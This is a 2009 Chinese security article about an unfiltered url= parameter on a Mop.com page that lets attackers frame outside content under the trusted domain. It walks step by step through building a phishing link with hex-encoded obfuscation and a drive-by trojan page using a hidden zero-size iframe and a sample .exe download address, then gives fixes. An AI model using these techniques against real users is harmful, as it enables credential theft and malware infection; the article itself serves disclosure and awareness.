加入收藏·设为首页·会员中心·我要投稿·RSS
您当前的位置:首页 > 电子商务 > 支付安全

我“代表”猫扑欺骗你!

时间:2009-07-20 00:01:58    来源:网络  作者:happy88

       很受年轻人喜欢的猫扑,有一个存在安全隐患的页面,黑客用这个安全隐患进行钓鱼、挂马,以猫扑的名义欺骗你。

  如果有一天,你收到一封包含猫扑链接的邮件或者QQ群里面有人发了猫扑链接,你会怀疑吗?如果在确定域名的确是猫扑的,相信很多人都会毫不犹豫的点击。此时,你有可能就陷入了黑客构造的钓鱼网站或者挂马陷阱(图1)。

  这是怎么回事?其实猫扑网站中的某些页面存在安全隐患(该安全隐患已经通知了猫扑网站)。黑客可以利用它进行网络钓鱼或者进行挂马,如何你上当点击了那些网页,你就可能被网络骗子受蒙骗或者电脑被病毒入侵。

image001.jpg (29.43 KB)
2009-6-1 11:12


未过滤外部网址

  图1其实是一个半真半假的网页,一部分是猫扑的真实页面,另外一部分页面是来自http://xingqibar.cn这个黑客钓鱼网站。之所以会出现这样的问题,主要就是猫扑的http://dzh2.mop.com/ladyClub/indexframe.jsp网页存在外部网址未过滤的情况。

  利用这个安全隐患,黑客可以构造http://dzh2.mop.com/ladyClub/indexframe.jsp?url=http://xingqibar.cn,“当用户访问这个网址的时候,indexframe.jsp会获取url=后面的地址,并将http://xingqibar.cn框架套入当前网页中,在特定位置显示出来。

  很显然,这是网页设计者在编写这个页面的时候忽略了对url=后面的参数进行过滤,这就如同一个公司虽然安装了大门,却忘记了给门安装门锁一样,其结果是由于没有钥匙的鉴别条件,每个人都能够混入这个公司,冒充公司内部的人员。

  通常正常的流程应该是,先获取url=后面的地址,之后判断这个地址是否合法,也就是这个url=后面的连接是否是网站内部的地址,这个可以通过JS脚本判断网址域名前面的字符来确定网址是否合法。

  比如dzh2.mop.com,通过判断.com前面的字符是否是mop,如果是内部合法地址就将其在页面中显示,外部网址就不在页面中显示,这样黑客就没有了可乘之机。几乎所有的给用户造成伤害的网络安全大问题都出在了对一个小小的细节的疏忽上。

钓鱼攻击演示

  第一步:黑客要先制作一个钓鱼网页。用Dreamweaver或者Microsoft Expression Web完成这个工作(图2),在这个钓鱼页面中使用Request输出函数,就可以保存钓鱼页面中输入的用户名、密码等信息。根据不同的需要,黑客可以制作不同的钓鱼网页,例如中奖钓鱼网页、购物钓鱼网页等。


image002.jpg (19.39 KB)
2009-6-1 11:12



  第二步:钓鱼页面制作好后,黑客会将钓鱼页面上传到自己的网站中,例如前面假设的http://xingqibar.cn,然后将钓鱼页面的链接地址添加到http://dzh2.mop.com/ladyClub/indexframe.jsp?url=的 “=”后面即可,这样一个伪装成猫扑的钓鱼“陷阱”就做成了。


第三步:高明的黑客还会给地址再加一个伪装,他们会加密钓鱼网址,让你无法看出地址里面接有另外一个一个地址,增加了迷惑性。黑客一般用的是URL16进制加密,将http://dzh2.mop.com后面的部分全部加密。


  登录可以对网址进行加密的网站http://tool.chinaz.com,在网页中找到“代码转换工具”项,然后点击选择下拉菜单中的“URL16进制加密”项(图3),之后将钓鱼网页链接地址输入到要加密的地址栏中,加密后为http://dzh2.mop.com/%6C%61%64%79%43%6C%75%62/%69%6E%64%65%78%66%72%61%6D%65%2E%6A%73%70?%75%72%6C=http://%78%69%6E%67%71%69%62%61%72%2E%63%6E。这样伪装后,一般用户就会只注意到http://dzh2.mop.com,而没有想到该网址连接了钓鱼页面。


image003.jpg (18.11 KB)
2009-6-1 11:12



  安全小百科:URL16进制加密是将URL中的单个字符转换成16进制,之后每个转换后的双位16进制前面加上%再连在一起就是加密后的地址了。以加密baidu.com为例,baidu.com加密后就是%62%61%69%64%75%2E%63%6F%6D(图4)。


image004.jpg (18.34 KB)
2009-6-1 11:12



挂马攻击演示


  除了伪装钓鱼网页之外,这个跨站漏洞还可以被黑客用作挂马攻击,挂马的关键就是制作挂马网页。


  第一步:黑客在挂马之前先就要准备网页木马,他们通常会使用网页木马生成器,例如使用的《MS09-002网页木马生成器》。


  打开这款生成器,在“木马下载地址”输入上传到指定空间的特洛伊木马地址,例如http://xinbqibar.cn/1.exe(图5),然后点击“生成”按钮,此时生成器会生成一个HTML网页,也就是黑客使用的挂马网页。


image005.jpg (10.78 KB)
2009-6-1 11:12



  第二步:将挂马网页上传到空间中,再复制上传后的网页木马链接地址,然后用记事本打开钓鱼页面,在钓鱼页面的HTML代码后面输入IFRAME框架挂马代码“<iframe src=http://网页木马链接地址 width=0 height=0></iframe>”(图6)。这样钓鱼页面就跟挂马页面有关联了,当用户访问钓鱼页面的同事就激活了挂马页面。


image006.jpg (14.46 KB)
2009-6-1 11:12


  安全小百科:IFRAME是HTML语言中的框架标签。HTML语言中< iframe >都是成对出现的,代码结束的时候则需要多出一个斜杠“ /” 表示代码结束。代码中的width表示框架的宽度为0,Height表示高度也为0,也就代表这个IFRAME框架既没有高度也没有宽度,那么这个框架就隐藏了。

  第三步:然后钓鱼页面上传到空间中,再将这个页面地址经过URL16进制加密后添加到“URL=”号之后,这样一个既能够挂马,又能够钓鱼的黑客页面就制作完成了。

  黑客会将这样的页面通过QQ群发等方式广为传播,对于那些缺乏防挂马软件的用户而言,不是中马就是被钓鱼,而且这一切都是伪装在网友们都极其信任并且极其有人气的猫扑网站之下,那些不设防的用户极少能够逃过这样的连环套。

漏洞修补之法

  对猫扑而言,要加强网站的安全性检测,特别是要增加对外部链接地址的过滤,对url=后面的外部链接参数过滤要在所有页面进行,不能遗漏一个。

  对普通用户而言,要避免被这个漏洞祸害,要有这样的信念,天下没有免费的午餐。例如你在猫扑什么也没做,突然通知你中了一个大奖,这种基本上是没有可能的。大家最好不要相信网络中奖,十之八九都是假的。

  如何你看到一个网址后面有大量的加密,就要多一个心眼,最好启动带有网页木马拦截功能的安全辅助工具,再打开网页,避免网页木马的骚扰。此外,大家还要勤打补丁,及时升级杀毒软件病毒库。

文章标签: 相关文章
发表评论 共有 条评论
用户名: 密码:
验证码:   匿名发表
精彩美文推荐
栏目更新
栏目热门